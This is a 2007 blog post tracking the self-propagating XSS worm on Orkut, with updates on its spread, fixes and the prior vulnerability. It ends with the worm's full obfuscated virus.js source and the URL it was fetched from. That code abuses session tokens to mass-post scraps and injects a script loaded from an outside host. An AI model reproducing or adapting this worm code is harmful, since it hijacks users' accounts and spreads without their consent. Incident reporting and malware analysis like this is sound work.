Orkut XSS

19 Dec 2007 · #techtalk

Aftermath: Let’s try and summarize everything here.

On Orkut, you can use arbitrary HTML when scrapping your friends. Rodrigo’s worm exploited this ‘feature’. What it did was to start with scrapping a malicious flash file. Just viewing this scrap causes the flash object to load which in turn loads our favourite virus.js file. The Javascript code in that file first joins you in the community called Infectatos pelo Virus do Orkut (in English - Infected by the Orkut Virus) and then sends the same flash file as a scrap to as many people in your friends list as possible. So when each of your friends sees their Scrapbook, they in turn start propagating the worm to their friends, etc.
Friends don’t let friends use raw HTML would be a good maxim for everyone to follow ;-)
It’s fair to say that almost every member of that community was an involuntary signup. So based on the reported peak size of the community, more than 655,000 users were affected.
The attack was apparently without malicious intent and done just to highlight the security problems with such networking sites. Although the motives might by clean, I question the modus operandi. McAfee folks have named this W32/KutWormor.
This post got linked from various places including several bloggers, News.com, ZDNet and Valleywag(!). But, like Valleyway points out, if this had happened on MySpace or Facebook, it would be all over the US media.
No official word from Orkut yet on this except this reply in a forum thread. Amusingly, the list of suggestions offered in that reply to ‘stay safe’ wouldn’t have helped at all with this worm! This worm would have worked anyway unless you had Flash and/or Javascript disabled.
Curiously enough, the official Orkut blog got a new post during/after this incident but the post says absolutely nothing about what happened!

That’s the summary and hopefully the last update here! The original post covering this worm follows below.

Someone (maybe Rodrigo Lacerda, see below) seems to have found an XSS attack for Orkut. A piece of javascript code, named virus.js and fetched from a myopera location, somehow made its way into my Orkut session and started scrapping everyone possible at a break-neck speed. My friends reported ~~Spanish~~ Portuguese (see first comment below) language scraps with some Flash content from me while I’ve seen similar scraps in my Scrapbook.

From my initial Firebug console digging, this code sneaks in when opening the Scrapbook page. And the attack code is fetched just after loading gtalknotifier004.js so perhaps there’s an XSS hole in that script. Not sure though, I’m a JS newbie :-)

For now, don’t log on to Orkut! Or if you use Adblock, just block anything named *virus.js

Does anyone know how the hell should I report such stuff to Orkut? I can’t seem to locate any vulnerability report form in their support pages.

Update: If you’ve blocked the virus.js file, log in and check your communities. You’ll see an extra one! If you aren’t able to unjoin the community, don’t panic. I believe it’s just an automated throttling response by Orkut’s systems as a response to the massive scrapping initiated from our account. Should be fixed in a few hours.

Update: The embedded flash in the notorious scrap (2008 vem ai… que ele comece mto bem para vc) is also part of the exploit. I don’t know exactly what it does since I use Flashblock all the time! Also, some blogs are suggesting changing of passwords. I don’t think that’s needed since I don’t believe passwords have been compromised. Of course, don’t treat my opinion as infallible advice, do what you must. I know I’m not changing my password just because of this!

Update: Reader Steve (thanks!) informs me in the comments below that this hole was reported sometime back and was already fixed. From this page:

On November 8th 2006 Rajesh Sethumadhavan discovered a type 2 vulnerability in the social network site Orkut which would make it possible for orkut members to inject HTML and JavaScript into their profile. Rodrigo Lacerda used this vulnerability to create a cookie stealing script known as the Orkut Cookie Exploit which was injected into the orkut profiles of the attacking member(s). By merely viewing these profiles unsuspecting targets had the communities they owned transferred to a fake account of the attacker. On December 12th Orkut had fixed the vulnerability.

And the actual report referenced in the above quote: Orkut Group Cross Site Scripting Vulnerability. I don’t know enough to say whether the situation we are seeing today is due to the same vulnerability.

Update: People seem to think that somehow they were responsible for facilitating this attack. Like perhaps they clicked on a bad link or something. From what I understand, this isn’t a phishing attack and there’s nothing you could’ve done to prevent this. Except, maybe, not visiting Orkut.com!

Update: Apparently fixed!. The virus.js file is no longer fetched and all the spam scraps in my scrapbook have disappeared. I could unjoin the ‘special’ community too, which at this point of time has 390,262 members which means (at least) 390,262 affected users. That’s not good!

Update: More from Reader Steve in the comments. Apparently, the community that we all are involuntarily a part of now, is some kind of vigilante community created just to make a point that these systems are insecure. Steve’s comment:

The infected group is called “Infectados pelo Vírus do Orkut” and has nearly 400K members (minus me now).
The group description (loosely translated via Babelfish) is:
In computer science, a virus is a malicious program developed by programmers who, such as a biological virus, infectum the system, makes copies of itself exactly and tries to spread itself for other computers, using itself of diverse ways. Return more for the community SEES AS IF TO PROTECT Click With this you if not to want here. CALM! If you lode to stop in this community, is certain that no data its were stolen and nor go to be, is not this my objective. If I will be certain, in the end of everything, this community I must I am crowded of people. This to only show as orkut can be dangerous, you came to stop here without clicar in none link absolutely malicious, everything was made reading scraps.

Update: Some readers have kindly posted deobfuscated versions of the virus.js script. Thanks! Since they weren’t fitting well in the comments below, I’ve moved them to a pastebin site. See version 1 and version 2. I’ll post some analysis if I get time to do some!

The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js

function $(p,a,c,k,e,d) {
    e=function(c) {
        return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
    };
    if(!''.replace(/^/,String)){
        while(c--){d[e(c)]=k[c]||e(c)}
        k=[function(e){return d[e]}];
        e=function(){return'\\w+'};
        c=1
    };
    while(c--){
        if(k[c]){
            p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
        }
    }
    return p
};
setTimeout(
    $('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
    L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
    7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
    8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
    5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
    7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
    7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
    t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
    3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
    3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
    7 V(){6(j==8.18("N").M){b};
    5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o=\\"o://k.w.p/28.z\\" 2a=\\"Q/x-2c-2d\\" 2e=\\"2g\');
    r=8.1n(\'r\');r.1o=\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1C=\\"1\\" 1E=\\"1\\"><!--13-->";
    5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
    3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
    3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
    6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
    ',62,150,'|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
    www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
    |prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
    signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
    readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
    getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
    createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
    setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
    history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
    wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
    |XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
author="Rodrigo Lacerda"